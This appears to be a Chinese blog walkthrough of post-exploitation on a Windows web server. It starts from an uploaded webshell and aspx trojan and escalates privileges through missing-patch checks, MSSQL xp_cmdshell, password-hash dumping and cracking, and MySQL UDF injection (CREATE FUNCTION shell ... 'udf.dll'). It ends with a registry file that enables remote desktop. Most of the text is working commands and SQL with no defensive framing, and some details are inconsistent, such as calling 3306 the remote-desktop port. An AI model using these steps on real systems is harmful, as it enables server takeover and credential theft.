首先上传一个webshell网站上
查看里面的内容,以及shell功能。
由于这个shell本身自带的cmd命令不能运行,而且上传cmd不成功
有新建文件的功能
然后上传一个aspx的马,这个木马的权限。比asp的权限高。
但是前提你必须要知道,那个目录有可读可写可执行的权限。
进入aspx的木马中。
发现这个马中的cmd也没有权限。
那就上传一个cmd。
然后在asp马上执行,一下
systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280
KB3143141 KB3134228 KB3079904 KB3077657 KB3124280
KB3045171 KB2829361 KB3000061 KB2850851 KB2707511
KB970483 KB2124261 KB2271195) do @type C:\Windows
\Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /
q /a C:\Windows\Temp\temp.txt
查看补丁的补丁编号。
这个时候可以上传一个利用补丁漏洞的shell,IIS6
创建一个用户。
把他放到admin用户组中
启动用户。
查看用户信息。
已经是admin用户了。
然后可以远程连接了。
MSSQL权限提升
在上传的aspx木马上,使用database连接
使用mssql,以及下面的回显信息表示成功。
使用XP_cmdshelll exec
一般数据库都是禁用这些功能的。
利用Add xp_cmdshell(SQL2005)开启xp_cmdshell服务。
接下来我么可以创建一个用户。
把用户添加到,admin组中。
完成远程连接
而且我们也可以,上传一个gethash的exe获取,账户密码hash。
可以利用解hash网站来获得密码
http://www.objectif-securite.ch/ophcrack.php
利用UDF提权
什么是UDf
UDF顾名思义,就是User defined Function,用户定义函数。我们知道,MySQL本身支持很多内建的函数,此外还可以通过创建存储方法来定义函数。UDF为用户提供了一种更高效的方式来创建函数。
UDF与普通函数类似,有参数,也有输出。分为两种类型:单次调用型和聚集函数。前者能够针对每一行数据进行处理,后者则用于处理Group By这样的情况
使用UDF的优点
1)UDF的兼容性很好,这得益于MySQL的UDF基本上没有变动
2)比存储方法具有更高的执行效率,并支持聚集函数
3)相比修改代码增加函数,更加方便简单
UDF提权利用过程
- 在上传的shell中,没有操作系统的漏洞,可以采用mysql的UDF提权。
- 导入udf.dll文件到服务器指定目录
1.档mysql版本大于5.1 需要把udf.php文件导入到mysql安装目录下/lib/plugin_dir目录(默认目录不存在,创建目录,查看select @@basedir)
2.mysql版本小于5.1 udf.php导入到c:\windows\目录 - 使用sql语句创建功能函数
CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'
- 执行mysql语句调用新创建的函数
select shell(‘cmd','whoami')
- 删除创建的函数
drop function shell;
1.利用大马自带的mysql执行功能查看版本信息。
而且这个测试环境也可以使用操作系统提权
2.上传一个udf.php用来协助我们更方便的实现上传udf.dll上传到服务器上
生成一个shell,然后调用系统命令,创建一个用户并把用户添加到管路员组。
完成添加用户到admin的功能。
远程连接(远程连接的前提功能是服务器开启3306端口)
如果没有开启我们可通过创建一个.reg文件来开启。
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000D3D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000D3D
regedit /s C:\3389.reg
网友评论